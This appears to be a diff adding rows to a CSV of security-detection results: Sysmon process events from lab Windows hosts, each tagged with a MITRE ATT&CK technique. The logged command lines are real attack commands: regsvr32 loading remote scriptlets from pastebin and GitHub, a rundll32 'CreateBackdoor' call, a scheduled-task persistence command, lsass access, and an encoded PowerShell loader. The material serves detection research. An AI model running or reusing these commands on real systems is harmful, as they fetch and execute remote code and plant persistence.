+ C:\Windows\System32\regsvr32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-63FC-5CD8-0000-0020EE3E0100
+ 0x13eee
+ 1
+ Medium
+ SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
+ 365ABB72-6693-5CD8-0000-0010AE4C0E00
+ 3528
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 18918
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ DC1.insecurebank.local
+
+
+
+
+ technique_id=T1033,technique_name=System Owner/User Discovery
+ 2019-05-16 16:08:40.350
+ DFAE8213-8B08-5CDD-0000-001011CE0A00
+ 3764
+ C:\Windows\System32\whoami.exe
+ 6.3.9600.16384 (winblue_rtm.130821-1623)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ DFAE8213-832F-5CDD-0000-0020E7030000
+ 0x3e7
+ 2
+ System
+ SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47
+ DFAE8213-8B02-5CDD-0000-00109BCA0A00
+ 1720
+ C:\Windows\System32\osk.exe
+ "C:\Windows\System32\osk.exe"
+
+",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16792
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 18:35:05.140
+ 365ABB72-6759-5CD8-0000-0010E2D50F00
+ 1420
+ C:\Windows\System32\regsvr32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-63FC-5CD8-0000-0020EE3E0100
+ 0x13eee
+ 1
+ Medium
+ SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
+ 365ABB72-6693-5CD8-0000-0010AE4C0E00
+ 3528
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16792
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 18:35:05.140
+ 365ABB72-6759-5CD8-0000-0010E2D50F00
+ 1420
+ C:\Windows\System32\regsvr32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-63FC-5CD8-0000-0020EE3E0100
+ 0x13eee
+ 1
+ Medium
+ SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
+ 365ABB72-6693-5CD8-0000-0010AE4C0E00
+ 3528
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243538
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.021
+ 747F3D96-9F69-5E75-0000-00106F6A2000
+ 2536
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1589329703.257302,2020-05-13T04:28:23.257302+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 148597
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-05-13 00:28:16.115
+ 747F3D96-3F20-5EBB-0000-0010035E3600
+ 8052
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ C:\Windows\system32\cmd.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-3821-5EBB-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-3821-5EBB-0000-001040690000
+ 732
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243538
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.021
+ 747F3D96-9F69-5E75-0000-00106F6A2000
+ 2536
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c pause ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 376
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-21 00:35:07.386
+ 365ABB72-47BB-5CE3-0000-00108CAD3E00
+ 3176
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\cmd.exe /c pause
+ C:\Users\IEUser\Downloads\
+ IEWIN7\IEUser
+ 365ABB72-39CC-5CE3-0000-002096C70000
+ 0xc796
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-47BB-5CE3-0000-0010BFA83E00
+ 1912
+ C:\Users\IEUser\Downloads\com-hijack.exe
+ "C:\Users\IEUser\Downloads\com-hijack.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243538
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.021
+ 747F3D96-9F69-5E75-0000-00106F6A2000
+ 2536
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558969979.57807,2019-05-27T19:12:59.578070+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6193
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:59.510
+ 365ABB72-FE7B-5CEB-0000-0010867F0C00
+ 4012
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-FD85-5CEB-0000-00104C0E0B00
+ 1944
+ C:\Windows\System32\notepad.exe
+ "C:\Windows\System32\notepad.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003] Credential Dumping - Process Access,1552849805.303341,2019-03-17T23:10:05.303341+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10,"
+
+
+
+
+ 10
+ 3
+ 4
+ 10
+ 0
+ 0x8000000000000000
+
+
+ 4442
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC04.example.corp
+
+
+
+
+
+ 2019-03-17 19:10:02.068
+ 365ABB72-9B85-5C8E-0000-0010C4CC1200
+ 3576
+ 3620
+ C:\Windows\system32\taskmgr.exe
+ 365ABB72-0886-5C8F-0000-001030560000
+ 476
+ C:\Windows\system32\lsass.exe
+ 0x1fffff
+ C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Windows\system32\taskmgr.exe+1360e|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d
+
+",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557686932.766629,2019-05-12T22:48:52.766629+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16840
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 18:48:52.344
+ 365ABB72-6A94-5CD8-0000-0010C2F10E00
+ 3880
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\cmd.exe"
+ c:\ProgramData\
+ IEWIN7\IEUser
+ 365ABB72-695E-5CD8-0000-002015370100
+ 0x13715
+ 1
+ Medium
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-6A94-5CD8-0000-00101BDB0E00
+ 1340
+ C:\ProgramData\jabber.exe
+ jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.971708,2019-05-27T05:29:17.971708+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.username ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5907
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:17.931
+ 365ABB72-3D6D-5CEB-0000-00108C7FFF00
+ 3196
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.username
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1555606584.893827,2019-04-18T20:56:24.893827+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( Powershell ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 13
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1086,technique_name=PowerShell
+ 2019-04-18 16:56:08.340
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Powershell
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-AB27-5CB8-0000-002021CA0000
+ 0xca21
+ 1
+ High
+ SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
+ 365ABB72-AC01-5CB8-0000-0010BB7E0700
+ 1196
+ C:\Windows\System32\cmd.exe
+ "cmd.exe" /s /k pushd "C:\Users\IEUser\Desktop"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 18851
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-18 17:51:14.254
+ 365ABB72-4612-5CE0-0000-00103D1E2600
+ 2600
+ C:\Windows\System32\regsvr32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-433D-5CE0-0000-002031350100
+ 0x13531
+ 1
+ Medium
+ SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
+ 365ABB72-433C-5CE0-0000-00100FD20000
+ 964
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 18851
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-18 17:51:14.254
+ 365ABB72-4612-5CE0-0000-00103D1E2600
+ 2600
+ C:\Windows\System32\regsvr32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-433D-5CE0-0000-002031350100
+ 0x13531
+ 1
+ Medium
+ SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
+ 365ABB72-433C-5CE0-0000-00100FD20000
+ 964
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 18851
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-18 17:51:14.254
+ 365ABB72-4612-5CE0-0000-00103D1E2600
+ 2600
+ C:\Windows\System32\regsvr32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-433D-5CE0-0000-002031350100
+ 0x13531
+ 1
+ Medium
